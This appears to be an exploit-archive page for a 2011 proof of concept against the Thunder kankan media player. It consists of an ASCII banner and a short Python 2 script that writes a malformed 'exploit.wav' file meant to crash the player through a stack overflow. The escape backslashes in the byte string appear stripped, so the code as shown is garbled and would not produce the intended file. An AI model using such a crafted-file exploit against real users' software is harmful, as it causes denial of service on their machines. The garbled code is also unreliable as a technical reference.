[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Thunder kankan player Stack overflow/DOS Exploit
# Published : 2011-11-18
# Author :
# Previous Title : Bugbear FlatOut 2005 Malformed .bed file Buffer Overflow Vulnerability
# Next Title : PcVue <= 10.0 Multiple Vulnerabilities
#!/usr/bin/env python
print """
#1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
#0 ___ ___ ___ ___ ___ ___ 1
#1 /__ / /__ /__ / /__ 0
#0 /:/ / /:: /:/ / /:/ / /:: /:/ / 1
#1 /:/__/ /:/: /:/ / /:/ / /:/: /:/__/ 0
#0 /:: ___ /::~: /:/ / /:/ / /:/ : /::______ 1
#1 /:/: /__ /:/: :__ /:/__/ /:/__/ /:/__/ :__ /:/:::::__
#0 /__:/:/ / :~: /__/ : : : /:/ / /_|:|~~|~ 1
#1 ::/ / : :__ : : : /:/ / |:| | 0
#0 /:/ / : /__/ : : :/:/ / |:| | 1
#1 /:/ / :__ :__ :__ ::/ / |:| | 0
#0 /__/ /__/ /__/ /__/ /__/ |__| 1
#1 0
#0 [+] Exploit Title: Thunder kankan player Stack overflow/DOS Exploit 1
#1 [+] Date :11/17/2011 0
#0 [+] Author: hellok(warptencq[dot]gmail.com) 1
#1 [+] Software Link: dl.xunlei.com/xmp.html 0
#0 [+] Version : 4.8.3.840(last) 1
#1 [+] Tested On: WIN 7 0
#0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-1
"""
filepath = "exploit.wav"
f = open(filepath, "wb")
file = 'x52x49x46x46x62xb8x20x20x57x41x56x45x66x6dx74x20'
f.write(file)
f.close()
print "Done.nOpen exploit.wav"